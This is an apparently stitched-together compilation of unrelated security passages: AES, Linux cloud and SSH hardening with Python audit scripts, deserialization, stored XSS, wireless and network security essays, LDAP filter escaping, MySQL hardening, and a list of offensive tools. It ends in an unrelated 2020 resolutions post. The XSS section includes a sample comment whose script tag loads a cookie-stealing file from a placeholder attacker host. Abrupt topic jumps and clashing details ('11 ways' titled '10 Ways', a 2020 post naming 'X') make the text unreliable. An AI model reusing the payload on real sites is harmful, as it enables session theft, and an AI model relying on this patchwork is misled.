AES is a fast, efficient, and secure encryption standard. Certified by the National Institute of Standards and Technology (NIST), AES is used by the United States government to secure classified data.
What does AES stand for?
AES stands for Advanced Encryption Standard and is a symmetric-key cipher. There are two fundamental kinds of cipher algorithms:
Asymmetric-key ciphers
These use public-key cryptography to allow the secure exchange of keys over a distance (such as over the internet). Data is encrypted using a public key, which is made widely available, but which can only be decrypted using the correct private key (which only the intended recipient should possess). Asymmetric-key ciphers require a high level of computational power. This makes them relatively slow, and thus most useful for encrypting small amounts of data. RSA, for example, is an asymmetric cipher used to encrypt just the keys during the TLS exchange that occurs when connecting to an HTTPS website.
Symmetric-key ciphers
The same key is used to both encrypt and decrypt the data. There may sometimes be a simple transformation between the two keys, but they are always derived from the same key. Symmetric-key ciphers require much less processing power than asymmetric-key ciphers and are therefore often cited as being around 1,000 times faster. This makes symmetric-key ciphers ideal for encrypting large volumes of data. Where large amounts of data need to be transmitted over a distance (such as over the internet), the data itself is encrypted using a symmetric-key cipher, such as AES, while the key exchange is secured using an asymmetric-key cipher, such as RSA.
Now that we have taken a look at how Linux security on-premises works, we can look at why Linux in the cloud is much better in terms of physical security, and how it differs from Linux on-premises.
Many cloud hosting providers exist on the internet, and all offer the same type of package regarding getting your Linux server up and running, so it can be a daunting task to pick the right cloud hosting provider.
Given that the cloud removes the physical aspect of hosting a server, it also eliminates the physical layer of server security, which makes everything simpler. Cloud hosting providers offer varying levels of control over the (virtual) hardware, from booting and shutting down servers to setting up customized firewalls.
Let us take a look at some of the essential security measures to be taken in the cloud.
Console and account access
Your security policy should define the various individuals and their respective accounts that will have access to the cloud hosting provider console or dashboard, and the multiple permissions for interacting with the servers and any other resources. This will prevent unauthorized access by individuals who may not know how to interact with the dashboard or have malicious intent. This will also create a system of accountability, as only individual accounts will have direct access to interact with the servers.
SSH (Secure Shell)
SSH (Secure Shell) is a network protocol that allows users to securely access a computer remotely over an unsecured network.
SSH will be the primary access point to your server, so it is essential to secure it correctly. Let us take a look at the various ways this can be done.
Change the default SSH port from port 22 to another, non-standard port, because the default SSH port is a constant target of brute force attacks.
Make use of SSH keys instead of password-based authentication. This is extremely important, as passwords can easily be guessed by brute force attacks and commonly used wordlists. SSH keys use asymmetric encryption: the public key is stored on the server and the private key is stored on your computer, so the server can only be accessed by whoever holds the private key.
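The two SSH points above (non-default port, keys instead of passwords) are settings in sshd_config, so a practitioner usually wants a quick way to check a host against them. The following is an added example, not code from the book: it parses a constructed sshd_config fragment the way sshd does (directives are case-insensitive, first occurrence wins, commented-out lines fall back to OpenSSH's shipped defaults) and lists the checks the configuration fails. The sample configurations, function names and finding strings are all assumptions made for the example.

```python
# Constructed sshd_config samples (not from any real host).
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
#PasswordAuthentication yes
PubkeyAuthentication yes
"""

HARDENED_SSHD_CONFIG = """\
Port 2222
PermitRootLogin prohibit-password
PasswordAuthentication no
PubkeyAuthentication yes
AuthenticationMethods publickey
"""


def parse_sshd_config(text):
    """Return {directive: value} as sshd would see it.

    Directive names are case-insensitive and, outside Match blocks, sshd keeps
    the first occurrence of a directive and ignores later duplicates.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        settings.setdefault(key, value)          # first occurrence wins
    return settings


def audit_sshd_config(text):
    """List the checks from the text that the configuration fails.

    Missing directives are compared against OpenSSH's shipped defaults, so a
    commented-out 'PasswordAuthentication yes' still counts as enabled.
    """
    s = parse_sshd_config(text)
    findings = []
    if s.get("port", "22") == "22":
        findings.append("sshd listens on the default port 22")
    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append("password authentication is enabled")
    if s.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("public-key authentication is disabled")
    if s.get("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append("root may log in with a password")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(label, audit_sshd_config(cfg) or ["no findings"])
```

Run it against the real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; the important design point is that an absent directive is compared with the daemon's default rather than ignored, which is what makes the commented-out line in the weak sample show up.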
Setting up a firewall
Many cloud hosting providers offer firewall functionality that allows you to close any open ports that are not being used. This can be done at different levels of abstraction: for example, on AWS you can create a security group that specifies the particular ports that can be accessed and associate it with your server. The same can also be done on the server itself with a tool like iptables.
Backups
Backups are vital for organizations that handle data. Many things can go wrong, not only from a security standpoint but also from a system administration standpoint: databases and files can be deleted by mistake, or hackers could gain unauthorized access and compromise the integrity of the data. Most cloud hosting providers offer backup and snapshot services that are worth every penny, because they can be set up to automatically back up and take snapshots of your servers. If you prefer to back up files manually, you can also automate the process with bash scripts.
However, manual backups may not offer the same level of reliability and may not guarantee complete restoration; for this reason, automated tools and programs are recommended to streamline the process and ensure that data can be recovered correctly. We will not be covering the various tools that can be used for creating backups in this book as multiple factors like subscription costs are dependent on your security policy.
DDoS and Brute force protection
Brute force and DDoS are some of the most common types of attacks on servers. They usually target the web application or particular ports. In the case of SSH, many tools can be used to prevent brute force attacks; an example is SSHGuard, a tool that blocks sources of repeated failed login attempts on both the SSH and FTP protocols. DDoS attacks are equally common and are usually made possible by exposing the origin IP address of the server to the public; this should be avoided at all costs and will save you a lot of pain when securing your server. Using a Content Delivery Network (CDN) like Cloudflare will mitigate this risk and provide other functionality like a WAF (Web Application Firewall).
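Tools like SSHGuard work by watching the authentication log for clusters of failed logins from one source. The following is an added example, not code from the book or from the SSHGuard project, showing that detection logic in plain Python over a few constructed auth.log lines (the hostnames, timestamps and IP addresses from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 are made up for the example). It flags any source with at least `threshold` failures inside a sliding window of `window_seconds`; the threshold and window values are assumptions, not SSHGuard's defaults.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines in the syslog format used by OpenSSH.
SAMPLE_AUTH_LOG = """\
Jan 10 03:14:01 web1 sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51012 ssh2
Jan 10 03:14:02 web1 sshd[2211]: Failed password for root from 203.0.113.7 port 51013 ssh2
Jan 10 03:14:03 web1 sshd[2212]: Failed password for root from 203.0.113.7 port 51014 ssh2
Jan 10 03:14:04 web1 sshd[2213]: Failed password for invalid user test from 203.0.113.7 port 51015 ssh2
Jan 10 03:14:05 web1 sshd[2214]: Failed password for invalid user oracle from 203.0.113.7 port 51016 ssh2
Jan 10 03:20:10 web1 sshd[2300]: Failed password for alice from 198.51.100.4 port 40022 ssh2
Jan 10 03:20:15 web1 sshd[2301]: Accepted publickey for alice from 198.51.100.4 port 40023 ssh2
"""

# Matches sshd's "Failed password" line; "invalid user" appears when the
# account does not exist, so it is optional here.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s\d\d:\d\d:\d\d)\s\S+\ssshd\[\d+\]:\s"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_failed_logins(log_text):
    """Return a list of (timestamp, source_ip, username) for failed logins."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            # syslog timestamps carry no year; strptime fills in 1900, which
            # is fine because only differences between timestamps are used.
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("ip"), m.group("user")))
    return events


def find_brute_force_sources(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: total_failures} for every source that produced at
    least `threshold` failed logins within any `window_seconds` span."""
    by_ip = defaultdict(list)
    for ts, ip, _user in parse_failed_logins(log_text):
        by_ip[ip].append(ts)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        # Slide a window of `threshold` consecutive failures along the list.
        for i in range(len(times) - threshold + 1):
            span = (times[i + threshold - 1] - times[i]).total_seconds()
            if span <= window_seconds:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    for ip, count in find_brute_force_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {count} failed logins, candidate for blocking")
```

The single failure from 198.51.100.4 followed by a successful key login is the normal case (a typo, then the right key) and is not flagged; the five failures in four seconds from 203.0.113.7 are. A blocking tool would feed the flagged address to the firewall, which is exactly what SSHGuard automates.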
System and package updates
Keeping your operating system, kernel, and packages up to date is very important, as new vulnerabilities may be discovered that affect your OS or packages; as a result, patches for these vulnerabilities will be pushed, and you will need to patch your system immediately.
These are some of the fundamental cloud security practices for your servers and infrastructure; they will be explained in detail later in the book.
Now that we have differentiated Linux security in the cloud from Linux security on-premises, we can see how the cloud offers much better protection by eliminating the need for physical security and giving us a much more extensive range of services.
Let us now look at how to develop a security policy inclusive of both the physical and software aspects of security.
Applications handle complex data structures. Serialization converts the structures into an object that can be stored and transmitted easily. For example, think about different actions that go into making a peanut butter and jelly sandwich:
Get plate
Get bread
Open bread
Take out bread 1
Put bread 1 on plate
Take out bread 2
Put bread 2 on plate
Get knife
Get peanut butter
Open peanut butter
Get jelly
Open jelly
Get peanut butter on knife
Put peanut butter on bread 1
Get jelly on knife
Put jelly on bread 2
Smoosh bread 1 and bread 2 together with covered sides facing
You need all of these things to happen as part of making the sandwich, but they aren’t necessarily step-by-step in this order. Having to send all 17 of these data points, like individual messages, every time someone asks for a peanut butter and jelly sandwich can be time-consuming to write down and send. Most likely, you’d group them in a document as “Peanut Butter and Jelly Sandwich” that you send when someone asks, similar to serialization. When the person opens the document, they can see each individual data point, similar to deserialization.
Deserialization is the process of reconstructing the original, expanded data structure. With a deserialization vulnerability, malicious actors can change the application logic or execute code remotely, one of the most serious attack types.
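The sandwich example above maps directly onto a data-only format such as JSON, and the safe way to reconstruct the structure is to validate its shape before using it rather than to trust whatever arrives. The following is an added example, not code from the original text: it serializes a (shortened, constructed) recipe to JSON and deserializes it through a checker that rejects anything other than the expected object. The limits and error messages are assumptions for the example.

```python
import json

# Constructed recipe mirroring the text's step list (abbreviated).
SANDWICH = {
    "name": "Peanut Butter and Jelly Sandwich",
    "steps": [
        "Get plate",
        "Get bread",
        "Put peanut butter on bread 1",
        "Put jelly on bread 2",
        "Smoosh bread 1 and bread 2 together with covered sides facing",
    ],
}

MAX_STEPS = 50        # assumed upper bounds so a hostile document cannot
MAX_STEP_LEN = 200    # balloon memory or processing time


def serialize_recipe(recipe):
    """Flatten the structure into one JSON document for storage or transit."""
    return json.dumps(recipe, sort_keys=True)


def deserialize_recipe(text):
    """Rebuild the recipe from JSON, accepting only the expected shape.

    JSON can only produce dicts, lists, strings, numbers, booleans and null,
    so parsing it never reconstructs arbitrary objects or runs code; formats
    such as Python's pickle do, which is why they must not be fed untrusted
    input. Even with JSON the shape still has to be checked before use.
    """
    try:
        data = json.loads(text)
    except json.JSONDecodeError as exc:
        raise ValueError(f"malformed JSON: {exc}") from None
    if not isinstance(data, dict) or set(data) != {"name", "steps"}:
        raise ValueError("recipe must be an object with exactly 'name' and 'steps'")
    name, steps = data["name"], data["steps"]
    if not isinstance(name, str) or not name:
        raise ValueError("name must be a non-empty string")
    if not isinstance(steps, list) or not 0 < len(steps) <= MAX_STEPS:
        raise ValueError(f"steps must be a list of 1..{MAX_STEPS} items")
    if not all(isinstance(s, str) and 0 < len(s) <= MAX_STEP_LEN for s in steps):
        raise ValueError("every step must be a short, non-empty string")
    return {"name": name, "steps": list(steps)}


if __name__ == "__main__":
    wire = serialize_recipe(SANDWICH)
    print(wire)
    print(deserialize_recipe(wire) == SANDWICH)
```

The contrast the passage draws is between the flattened document on the wire and the expanded structure in memory; the checker is what keeps an attacker-supplied document from turning into an unexpected structure on the way back.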
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
To successfully execute a stored XSS attack, a perpetrator has to locate a vulnerability in a web application and then inject malicious script into its server (e.g., via a comment field).
One of the most frequent targets is websites that allow users to share content, including blogs, social networks, video sharing platforms and message boards. Every time the infected page is viewed, the malicious script is transmitted to the victim’s browser.
Stored XSS Attack
While browsing an e-commerce website, a perpetrator discovers a vulnerability that allows HTML tags to be embedded in the site’s comments section. The embedded tags become a permanent feature of the page, causing the browser to parse them with the rest of the source code every time the page is opened.
The attacker adds the following comment: Great price for a great item! Read my review here
From this point on, every time the page is accessed, the HTML tag in the comment will activate a JavaScript file, which is hosted on another site and has the ability to steal visitors’ session cookies.
Using the session cookie, the attacker can compromise the visitor’s account, granting him easy access to his personal information and credit card data. Meanwhile, the visitor, who may never have even scrolled down to the comments section, is not aware that the attack took place.
Unlike a reflected attack, where the script is activated after a link is clicked, a stored attack only requires that the victim visit the compromised web page. This increases the reach of the attack, endangering all visitors no matter their level of vigilance.
From the perpetrator’s standpoint, persistent XSS attacks are relatively harder to execute because of the difficulty of locating a website that is both well trafficked and has a vulnerability that enables permanent script embedding.
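The defect in the e-commerce scenario is that comment text reaches the page source unchanged, so the browser parses it as markup. The fix is to encode at output time, for the context the text lands in, and to back that up with a Content-Security-Policy that refuses scripts from other origins (the stolen-cookie script in the scenario was hosted elsewhere). The following is an added example, not code from the original article: a minimal comment store and renderer in Python, with a constructed comment that contains a script tag pointing at a made-up host.

```python
import html

# In-memory stand-in for the site's comment table (constructed for the example).
COMMENTS = []

# Constructed hostile comment of the kind the text describes; the host is
# a documentation-style placeholder, not a real site.
HOSTILE_COMMENT = (
    'Great price for a great item! Read my review here '
    '<script src="https://attacker.example/steal.js"></script>'
)


def store_comment(text):
    """Store the raw text. Encoding is deferred to output time because the
    right encoding depends on where the value is rendered (HTML body,
    attribute, JavaScript string, URL), and the database is not the browser."""
    COMMENTS.append(text)


def render_comment(text):
    """Render one comment as an HTML list item with the text HTML-encoded.

    html.escape turns & < > " ' into entities, so whatever the comment
    contains is displayed as text and never parsed as tags or attributes.
    """
    return f"<li>{html.escape(text, quote=True)}</li>"


def render_comments_page():
    """Assemble the comments section from the stored comments."""
    items = "\n".join(render_comment(c) for c in COMMENTS)
    return f"<ul>\n{items}\n</ul>"


def response_headers():
    """Defence in depth: even if an encoding bug slips through, this policy
    makes the browser refuse to load scripts from any other origin."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }


if __name__ == "__main__":
    store_comment("Arrived on time, works as advertised.")
    store_comment(HOSTILE_COMMENT)
    print(render_comments_page())
```

Run as a script, the hostile comment is shown to visitors literally, angle brackets and all, and no request to the placeholder host is ever made; the page's earlier point that victims need not scroll down to the comments is exactly why output encoding has to be unconditional rather than applied only where an author expects trouble.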
Every discovery or invention ever made has some kind of radiation. Sometimes it is a positive vibe radiated, and sometimes it is a negative vibe. Sometimes the radiation is something chemical, and sometimes it is electrical. Every single life depends on such radiation. Even a human body radiates some warmth. Speaking of radiation, let’s talk about the radiations we often use in daily life which are also known as “Electromagnetic Fields” or EMFs that are emitted from a wireless router or what we often call “Wi-Fi”. The world is turning digital and so are our needs. Whatever you ask or wish for can be done digitally via the internet. From buying to selling, learning to teaching, paying to receiving, and so much more. You could say, we’re totally attached to digital life. A Wireless router is one of the most popular sources of access to the internet. Wi-Fi is basically a phenomenon that increases the capability of computer systems and allows them to connect and communicate with each other via the internet or you can say via an EMF. Well, we know that communication between devices is important to share data but is it safe or secure? Maybe or maybe not. Nothing is ever safe in the entire cosmic creation until proper actions have been taken to secure it. Wireless is no exception to it.
Before moving ahead, let’s think about “What does wireless security/pentesting mean?”.
Since the creation of entire existence, there isn’t anything created that isn’t even a little bit flawed regardless of what it is. Since “Wireless” is the star of our eye here, it isn’t anything different. Wireless security simply means protecting our network to secure ourselves from the danger that hovers above us while using the internet. In other words, wireless security refers to the prohibition of access to a computer system for those who are unauthorized so that no one faces any kind of loss. The internet is expanding further and further across the world and so are the dangers crawling in between it. For the sake of our own privacy and peace, it is quite important to have a secure network.
Now let the discussion move towards wireless pentesting. For proper security to be applied to something, it is necessary to first analyze where that security needs to be applied. In other words, it is necessary to find all the vulnerabilities or flaws in a system so as to patch it and make it secure. This is known as pentesting in layman’s terms. Pentesting, or penetration testing, is basically a process where a tester or hacker tries to hack into a computer system so that he/she can find a vulnerability that allows him/her to get into the system, which is later patched up or secured. Wireless pentesting is the same. In other words, wireless pentesting refers to the process of drawing out the vulnerabilities that could allow an attacker/hacker to get into a network and cause harm to a user.
We’ve discussed the meaning of wireless pentesting; now let’s take steps towards “Why it is necessary?”
The growing and expanding digital world is capable of making your work/tasks efficient as well as of harming or destroying you. An excess amount of something is always dangerous. This applies to a network as well. In the age of cyber technology and ongoing cybercrime, it is necessary to keep your distance from the harm. Let’s talk about what could happen in an insecure network. Since we’re talking about the wireless network here, let’s face the facts about that. The spreading of knowledge in the world can only reach so far. But wherever it reaches, there is someone who misuses this knowledge. Some of them are hackers, which you can also call “Black hat hackers”. There is much destruction an attacker can cause if he/she gets into your network. One destructive attack is the “Man in the middle” attack, where an attacker gets into your network and controls the flow of data from one system to another without the knowledge of the actual users or owners of those systems. Another instance is the “KRACK” attack, where an attacker can break or crack the password security on a network, intrude into a system and steal your data, payment card details, identity and so much more. An attacker can easily take control over an insecure wireless network or a wireless device, sniff out sensitive data that you send or receive using that network and use it against you, maybe to demand a ransom or maybe to hurt you or someone you care about emotionally. In the end, none of these attacks or threats results in anything good.
LDAP is a protocol that lets applications talk with directory services servers that store user IDs, passwords, and computer accounts. When applications accept user input and execute it, attackers can exploit the LDAP server by sending malicious requests.
Some examples of LDAP coding issues include:
Excess access privileges assigned to LDAP accounts
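The first sentence of the LDAP passage is the injection problem: user input concatenated into a search filter changes the filter's structure. The following is an added example, not code from the original text or from any LDAP library: it shows the unsafe construction beside a version that escapes the special filter characters defined by RFC 4515 (`*`, `(`, `)`, `\` and NUL) before interpolation. The filter layout `(&(objectClass=person)(uid=...))` and the function names are assumptions for the example; note that values placed in a distinguished name follow a different escaping rule (RFC 4514) and are not covered here.

```python
# RFC 4515 filter escaping: each special character becomes a backslash
# followed by its two-digit hex code. Mapping per character means the
# backslash itself never needs special ordering.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter(value):
    """Escape a value for safe inclusion in an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter_unsafe(username):
    """The vulnerable pattern: raw input spliced into the filter string.
    A username of '*' turns the lookup into a match on every person."""
    return f"(&(objectClass=person)(uid={username}))"


def build_user_filter(username):
    """The hardened pattern: the value is escaped, so metacharacters in the
    input are matched literally instead of restructuring the filter."""
    return f"(&(objectClass=person)(uid={escape_ldap_filter(username)}))"


if __name__ == "__main__":
    for name in ("alice", "*", "a)(uid=*"):
        print(repr(name))
        print("  unsafe:", build_user_filter_unsafe(name))
        print("  safe:  ", build_user_filter(name))
```

Escaping closes the injection route; the page's other point, excess privileges on the LDAP bind account, is what limits the damage if a bug elsewhere still lets a crafted filter through, so both belong together.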
In this vulnerable world, it’s necessary to take steps for the sake of existence. It could be against anything; whether it is a disease, an accident or maybe even a flaw in the system of existence.
One of the most important parts of a lifestyle is a NETWORK. Everything is done on a network in the upcoming digital world. From viewing to advertising, from purchasing to selling and from learning to teaching. Therefore, it is necessary to secure a network just so all users can keep themselves protected.
Now the first question that comes to our mind is “What is network security?”
Network security is basically a number of steps we follow in order to protect ourselves from different kinds of threats to the integrity, confidentiality, and availability of our data. These steps can be applied to both hardware equipment and software technologies. Effective and sufficient security steps allow secure and efficient access to the network. The main objective of network security is to detect all the flaws and vulnerabilities and patch them up so that a user is provided with a secure connection.
Before following any step, a person always wonders why network security is necessary or important.
Apparently, the most important and greatest reason for this is the attacks that a lot of users fall victim to while spending their time on the internet. There is a huge variety of attacks that are often performed to disrupt a network. Some of the most common attacks performed these days, from which we need to protect ourselves, are: malware attacks, which are launched to disrupt, damage or gain unauthorized access to a network or a computer system; botnets, where a number of private computers are infected with malicious software so that those systems can be controlled together, without the knowledge of their owners, to launch a new attack; DoS (Denial of Service), where an attacker floods a system or a server with a huge number of data packets just to make it lose its connection or overload and break; and many more attacks like these. Sometimes we fall victim to an attack by an entire organization, because multiple systems and a sufficient amount of resources are present there just to launch the attack, regardless of all the effort that needs to be put in. In May 2017, a huge number of systems running the Microsoft operating system were exploited all over the world by a single attack known as the “WannaCry ransomware”. This attack encrypted all the data present in target systems, and the exploiters demanded a ransom payment in the bitcoin currency from the victim user in return for their own data. The attack was estimated to have affected more than 0.2 million computer systems across 150 countries, with total damage of about millions to billions of dollars.
One thing that we think about is, “What are the harmful events that a hacker can cause which make us take steps towards network security?”
The most important reason for implementing network security is the destruction an attacker or hacker can cause to you or your system. An attacker can sniff out every username and password that you use for different accounts; they can disrupt your payment cards, such as credit or debit cards, or even use those cards to steal money from you; they can misuse your social security number; they can steal your sensitive data and misuse it; they can steal your identity and impersonate you while committing some serious crime; and there is so much more an attacker/hacker can do to harm you. Being in an advanced world, there are a lot of devices that have been invented that make it efficient for an attacker to harm you. One of them is the “LAN Turtle”, which can blend in physically with other network devices and can be used to gain remote, unauthorized access to your system by completely bypassing the network firewall, and can steal and store any available data. The “Bash Bunny” is another device that can hijack your network and inject malware through it to corrupt or infect your system; in addition, this device can gain access to the shell of your system and steal any information the attacker wants. Another device, known as the “LAN Tap”, is one of the most famous yet notorious devices; it is capable of tapping into your network and scanning and analyzing all the incoming and outgoing data, which can be modified or even disrupted in transit and, if encrypted, can sometimes be decrypted using various tools.
All these words conclude up to the fact that network security is quite essential in the trending digital lifestyle just so we’re able to use the internet at its full extent without facing any negatives that could lead us to a great loss.
In the pantheon of open source heavyweights, few technologies are as ubiquitous as the MySQL RDBMS. Integral to popular software packages like WordPress and server stacks like LAMP, MySQL is the foundational data platform for most websites and cloud services on the internet today. Unfortunately, its popularity translates to more commonly known attack vectors and security exploits — the following are 11 ways to shore up MySQL security and protect your data more effectively.
10 Ways to Improve MySQL Security
1. Drop the Test Database
The test database installed by the MySQL Server package as part of the mysql_install_db process can be fully accessed by all users by default, making it a common target for attackers. It should therefore be removed during post-installation hardening.
2. Remove All Anonymous Accounts
MySQL, by default, creates several anonymous users that essentially serve no purpose after installation. These accounts should therefore be removed, as their presence on the system gives attackers an entry point in the database.
3. Obfuscate the Root Account
Changing the MySQL root user account to a hard-to-guess name adds another layer of security, as attackers must determine the new account name before attempting to brute force the password values.
4. Disable Remote Logins
If local applications only use the MySQL database, remote access to the server should be disabled. This is done by opening up the /etc/my.cnf file and adding a skip-networking entry under the [mysqld] section. Configuring MySQL to stop listening on all TCP/IP ports, including 127.0.0.1, will effectively restrict database access to local, MySQL socket-based communications.
5. Change Default Port Mappings
MySQL, by default, runs on port 3306. This should be changed after installation to obfuscate what critical services are running on which ports, as attackers will initially attempt to exploit default values.
6. Remove and Disable the MySQL History File
Like the test database, the MySQL history file located at ~/.mysql_history is created by default during installation. This file should be deleted, as it contains historical details regarding installation and configuration steps performed, which could potentially result in the accidental exposure of passwords for critical database users. A symbolic link from ~/.mysql_history to the null device (/dev/null) should then be created to stop further logging into the file.
7. Do Not Run MySQL With Root Level Privileges
MySQL should be run under a specific, newly-created user account with the necessary permissions to run the service instead of directly as the root user. This adds some auditing and logging benefits while preventing attackers from gaining access by hijacking the root user account.
8. Alter Which Hosts Have Access to MySQL
If set up as a standalone server (i.e., application and web servers query the database from another server), the MySQL instance should be configured only to allow access from permitted hosts. This can be accomplished by making the appropriate changes in the hosts.deny and hosts.allow files.
9. Limit or Disable SHOW DATABASES
Again, stripping remote attackers of their information gathering capabilities is critical to a secure security posture. For this reason, the SHOW DATABASES command should be limited or removed entirely by adding skip-show-database to the [mysqld] section of the MySQL configuration file at /etc/my.cnf.
10. Disable the Use of LOAD DATA LOCAL INFILE Command
The LOAD DATA LOCAL INFILE command allows users to read local files and even access other files on the operating system, which could be exploited by attackers using methods such as SQL injection. The command should therefore be disabled by inserting set-variable=local-infile=0 into the [mysqld] section of my.cnf.
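Items 4, 5, 9 and 10 above are all settings in the [mysqld] section of my.cnf, so they can be verified mechanically. The following is an added example, not code from the original article: a small Python checker that reads a constructed my.cnf fragment with the standard library's configparser and reports which of those four settings are still at their weak values. It normalises option names the way the server does (case-insensitive, `-` and `_` interchangeable) and also unpacks the legacy `set-variable=name=value` spelling used in item 10, so that either form of the local-infile option is recognised; the sample files and finding strings are assumptions made for the example.

```python
import configparser

# Constructed my.cnf fragments (not from any real server).
WEAK_MY_CNF = """\
[mysqld]
port=3306
bind-address=0.0.0.0
local-infile=1
"""

HARDENED_MY_CNF = """\
[mysqld]
port=3307
skip-networking
skip-show-database
local_infile=0
"""


def load_mysqld_options(text):
    """Return the [mysqld] options as {normalised-name: value-or-None}.

    allow_no_value accepts bare flags such as 'skip-networking'; strict=False
    tolerates repeated keys as the server does. Directives like !includedir
    are not handled by configparser and would need separate treatment.
    """
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.read_string(text)
    opts = {}
    if cp.has_section("mysqld"):
        for key, value in cp.items("mysqld"):
            if key == "set-variable" and value and "=" in value:
                key, value = value.split("=", 1)          # legacy spelling
            name = key.strip().lower().replace("_", "-")
            opts[name] = value.strip().lower() if value is not None else None
    return opts


def audit_mysqld_options(text):
    """List the hardening items from the article that the file does not meet."""
    o = load_mysqld_options(text)
    findings = []
    if o.get("port", "3306") == "3306":
        findings.append("item 5: default port 3306 in use")
    if "skip-networking" not in o:
        findings.append("item 4: TCP/IP listener enabled (no skip-networking)")
    if "skip-show-database" not in o:
        findings.append("item 9: SHOW DATABASES open to all users (no skip-show-database)")
    if o.get("local-infile") not in ("0", "off", "false"):
        findings.append("item 10: LOAD DATA LOCAL INFILE not explicitly disabled")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_MY_CNF), ("hardened", HARDENED_MY_CNF)):
        print(label, audit_mysqld_options(cfg) or ["no findings"])
```

The file check only tells you what the daemon will read at its next start; to confirm the running instance, compare with the server's own view of the variables after a restart.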
Metasploit Framework – an open-source tool for exploit development and penetration testing. Metasploit is well known in the security community. Metasploit includes exploits for both server and client-based attacks, with feature-packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go-to tool if you want to break into a network or computer system.
Defending against Metasploit :
Keep all software updated with the latest security patches.
Use strong passwords on all systems.
Deploy network services with secure configurations.
Ettercap – a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap, use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!
Defending against Ettercap :
Understand that ARP poisoning is not difficult in a typical switched network.
Lockdown network ports.
Use secure switch configurations and NAC if the risk is sufficient.
sslstrip – using HTTPS makes people feel warm, fuzzy, and secure. With sslstrip, this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords, and emails from your boss, all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that warm fuzzy feeling.
Defending against sslstrip :
Be aware of the possibility of MITM attacks (arp, proxies/gateway, wireless).
Look for sudden protocol changes in the browser bar. Not really technical mitigation!
evilgrade – another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, iTunes, QuickTime and Winamp! It really whips the llama’s ass!
Defending against evilgrade :
Be aware of the possibility of MITM attacks (arp attacks, proxy/gateway, wireless).
Only perform updates to your system or applications on a trusted network.
Social-Engineer Toolkit – makes creating a social engineered client-side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open-source client-side attack weapon of choice.
Defending against SET:
User awareness training around spear phishing attacks.
Strong Email and Web filtering controls.
sqlmap – SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting SQL injection, but also has the capability to dump information from the database and to even launch attacks that can result in operating system shell access on the vulnerable system.
Defending against sqlmap :
Filter all input on dynamic websites (secure the web applications).
Use mod_security or other web-based filtering controls to help block malicious injection attacks (not ideal, as attackers are often able to bypass these web application firewalls (WAFs)).
aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.
Defending against aircrack-ng:
Never use WEP
When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).
oclHashcat – Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.
Defending against oclHashcat:
Passwords are the weakest link. Enforce password complexity.
As we confront the onset of 2020 with the force of a charging bull, it feels apt to formally document my New Year’s Resolutions for this year.
I’ve distilled my aspirations into two, but they carry a significant weight.
Truthfully, these transformative changes have been simmering in my thoughts for several months, if not years. Both are centered around refining how I interact with computers, enhancing my overall quality of life and happiness.
The essence of computing should enrich our lives, improve them, and elevate our happiness. If any aspect of the technological landscape—hardware, software, services, or features—contributes to discomfort, perhaps it’s time to contemplate letting it go.
My inaugural Resolution for 2020 is a seemingly simple yet essential shift that I’ve passionately advocated for throughout my journey, as followers of my timeline may already be aware.
Indeed, I am resolving to eliminate social media from my life entirely. This encompasses platforms such as X, Facebook, LinkedIn, Reddit, YouTube, and their equivalents. No more engaging in posting, reading, liking, commenting, or re-sharing content on any of these services or their analogs. While I’ll maintain the accounts to prevent impersonation, they will be closed off from active use.
